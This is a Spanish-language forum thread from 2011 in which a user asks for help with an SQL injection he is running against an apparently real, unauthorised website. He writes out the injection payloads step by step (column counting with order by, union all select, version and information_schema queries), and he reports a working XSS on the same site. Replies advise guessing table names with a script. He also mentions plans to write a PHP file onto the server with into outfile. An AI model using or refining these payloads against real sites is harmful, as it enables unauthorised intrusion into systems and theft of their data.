Autor
|
Tema: Ayuda en una inyeccion sql (Leído 4,557 veces)
|
xustyx
Desconectado
Mensajes: 213
|
Buenas a todos. El otro dia me dio por hacer una inyeccion a una web sin fines satanicos solo para pobrar si era vulnerable y lo era.. pero me pasan varias cosas y tengo las dudas 1.- Empiezo con order: vuln.php?id=69+order+by+10 no error .... 15 error .... 12 error ..... 11 no error vale es 11.... 2.- vuln.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--el servidor me tira ... Bad request ?¿? 3.- Añado "all" entre union y select y .... Hola me suelta las columnas vulnerables vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--4.- Miro la version de mysql: vuln.php?id=-1+union+all+select+1,@@version,2,3,4,5,6,7,8,9,10,11-- es 4.1.22 5.- Vamos ^^ vuln.php?id=-1+union+all+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables--y en vez de salirme nada me sale un error otra vez ... dos en concreto Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhost/xxxxxxxx/home/html/vuln.php on line 40Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /var/www/vhost/xxxxxxxxx/home/html/vuln.php on line 105He estado mirando y creo que puede ser que sea por que es MySql 4 pero bueno Un saludo a todos y gracias
|
|
« Última modificación: 25 Junio 2011, 13:28 pm por xustyx »
|
En línea
|
|
|
|
Shell Root
|
MySQL 4 no tiene information.schema, apartir del 5 la implementaron.
|
|
|
En línea
|
Te vendería mi talento por poder dormir tranquilo.
|
|
|
xustyx
Desconectado
Mensajes: 213
|
Sips ya me imaginava que seria algo asi pero entonces las Tablas se sacan de la manga no? hay que ir probando ...
|
|
|
En línea
|
|
|
|
Cleantesdeasso
Desconectado
Mensajes: 185
|
Buenas. Tienes q ir probando a mano, o hacerte un script con los nombres de las supuestas tablas y asi no te aburres tanto: admin, user, username, login, tbluser, administration... No se si en el foro ya habia algo similar por ahi...
|
|
|
En línea
|
"Que no!! q el hash hay q crakiarlo!!"
|
|
|
Shell Root
|
Si lo hay
|
|
|
En línea
|
Te vendería mi talento por poder dormir tranquilo.
|
|
|
xustyx
Desconectado
Mensajes: 213
|
Bueno el SQLi helper lo hace pero no me saca ninguna tabla :S
Y lo raro en la inyección es que si pongo alguna letra, como por ejemplo, +FROM salen los dos errores .... que pongo @@datadir también.... que pongo hola también... no se por que pasa esto :S en cambio para ver si en hex me dejaba codifique hola en hex y salia hola y también, probé si podia hacer un XSS y codifique un script de alert para ver si lo metía y si que funcionaba, cargaba la pagina se veían los numeros 2,3,4,5.... y salia la ventanita del XSS.
Lo que pasa es por ejemplo si quiero poner el +from en hex no me deja :S o hacer into outfile para crear un archivo php el que sea ya que tengo el path entero del server :S...
Seguiré buscando ... ^^
|
|
« Última modificación: 27 Junio 2011, 13:54 pm por xustyx »
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
ayuda con inyeccion sql
Nivel Web
|
tormenta
|
4
|
4,223
|
30 Marzo 2005, 06:45 am
por Colymore
|
|
|
Ayuda con inyeccion SQL!
Nivel Web
|
ilicitanohack
|
4
|
3,677
|
28 Noviembre 2007, 01:51 am
por berz3k
|
|
|
Inyeccion sql (mysql) Pasa x alto la inyeccion
Nivel Web
|
Littl3
|
3
|
6,611
|
5 Marzo 2009, 22:56 pm
por pedrox@
|
|
|
Ayuda sql inyeccion
Nivel Web
|
bhisorx
|
2
|
2,690
|
20 Septiembre 2009, 01:07 am
por WHK
|
|
|
Ayuda inyeccion sql
Nivel Web
|
mened12
|
1
|
2,335
|
8 Septiembre 2010, 00:12 am
por OzX
|
|